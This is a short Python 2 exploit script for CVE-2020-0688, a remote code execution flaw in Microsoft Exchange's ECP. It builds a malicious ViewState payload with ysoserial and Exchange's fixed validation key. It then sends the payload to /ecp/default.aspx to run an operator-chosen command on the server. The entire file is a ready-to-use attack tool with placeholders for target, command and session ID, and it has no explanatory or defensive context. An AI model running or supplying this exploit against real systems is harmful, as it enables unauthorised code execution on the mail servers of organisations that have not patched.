cve-2020-0688.py

import requests, os
import urllib

url = "https://mail.something.com" #input 1*
command = "cmd /c echo OOOPS!!! > c:/truongtn.txt" #input2*
aspsession = "1111a11c-11ad-1c11-1111-1111122f5977"  # input3*

cmd = """ysoserial.exe -p ViewState -g TextFormattingRunProperties -c \
"^^^" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" \
--generator="B97B4E27" --viewstateuserkey="###" --isdebug -islegacy > temp.txt"""

cmd = cmd.replace("###", aspsession)
cmd = cmd.replace("^^^", command)
print cmd
os.system(cmd)
with open("temp.txt", "r") as f:
    result = f.readline()
    result = f.readline()
    result = f.readline()
    result = f.readline()
    result = f.readline()
    result = urllib.quote_plus(result)

    final_url = url + "/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=" + result
    print final_url

    output = requests.get(final_url, verify=False)  # execute
    print "Done!"